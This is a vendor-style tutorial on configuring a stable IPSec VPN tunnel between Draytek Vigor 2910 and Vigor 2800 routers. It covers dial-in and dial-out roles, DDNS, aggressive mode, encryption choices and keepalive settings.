Draytek VPN tunnels are incredibly stable. Part of this is due to the design and code behind the routers, but knowing how to properly setup the tunnels for maximum uptime is an important and sometimes overlooked aspect when customers test our routers. In this example I will be setting up an IPSec tunnel between a Vigor 2910 and a Vigor 2800.

When it comes to building an IPSec tunnel the first thing I always consider is, who is dialing and who is receiving. Often times when customers consider this they will either want a bi-directional tunnel or they will have an established server/client VPN infrastructure already. There are several key factors when considering what layout to use, the foremost of which is the type of WAN connection on both ends, is it DHCP or Static? If both ends are static a bi-directional tunnel will be fairly stable, though for reasons I will get into in a moment I consider a clear server/client relationship to be more stable than a bi-directional one. If, however, one or both sides are Dynamic you have to setup DDNS services for the DHCP routers. In the case of Drayteks, if one side is static and the other dynamic, you can go one of two ways, if you have a DDNS name for the dynamic router already setup, you want the Static side dialing out to the Dynamic sides DDNS name, by doing this you circumvent having to use an aggressive mode tunnel. If you do not have a DDNS name, you'll want the Dynamic side dialing-in to the Static side, and you will have to use an aggressive mode tunnel. If both are dynamic, the caller and callee relationship doesn't matter so much, but again, the tunnel will be aggressive. In my case both ends of the tunnel are static, which is the most ideal situation for IPSec VPN's and will yield the best uptime results, so I will designate the 2800 as the Client and the 2910 as the Server.

So now that we know the general layout of the IPSec tunnel we can begin configuration. Starting with the Dial-Out or Client router

The important Settings here are Always On, which can only be selected for a Dial-Out connection, and "Enable PING to keep alive" which should always be set to the LAN IP of the remote end.

Now we will setup the Dial-Out Settings:

Strictly speaking, none of these settings directly relate to VPN stability, they are the nuts and bolts of establishing the tunnel. IKE Auth must match at both ends, and "Server IP/Host Name" can either be a static IP or DDNS name. The Dial-Out settings are the only place where host names are allowed without defining an IPSec Peer Identity. For simplicities sake, this is why I always recommend having a Static address Dial-Out to a Dynamic one, because you can enter the DDNS host name here.

Next we will define the Advanced IPSec settings, this is where the encryption algorithms for the tunnel will be defined:

Here I have chosen 3DES MD5 Group 2, in general 3DES gives fast performance to encryption strength ratio on Draytek routers, because 3DES is supported via the Hardware, whereas AES is supported via software. Phase 1 and 2 lifetimes depend greatly on the level of security you are trying to achieve, setting them to maximum will often yield better up times however.

Finally we define the TCP/IP settings for the tunnel, this defines the routing table for communication across the VPN:

In general you want to leave the "My WAN IP" and "Remote Gateway IP" settings at 0.0.0.0, these are only needed to bypass strict ACL settings on the far end. RIP should generally be turned off as well.

This completes the settings for the VPN Client or Dial-Out device. In this screen shot we will examine the Dial-In settings on the 2910 aka Server:

There isn't much to configure for the Dial-In settings, you have to specify the IP or IPSec identity of the node dialing-in, you then configure the allowed IPSec encryption types. Unchecking AH is important here to at least ensure an encrypted tunnel, you will notice there is no need to specify the exact encryption type used by the far end, the Draytek will auto negotiate to the callers encryption scheme as long as it is checked under "IPSec Security Method"

If you need to setup a tunnel where a dynamic client is dialing-out, you must setup an aggressive tunnel. On the client this is done under the Advanced IPSec settings:

Specifying a Local ID is an important step, as this is how the remote end will identify the callee. On the server side, the Peer ID is set to whatever was specified  as the Local ID on the client side.

Finally, we check the Connection Management screen to see our established VPN:

Following these guidelines will lead to a more stable VPN with better up time, which means fewer problems and happier users. You are now ready to apply QoS to the VPN tunnel for use with VoIP, another great feature of our routers. For help with that check out our QoS Guide.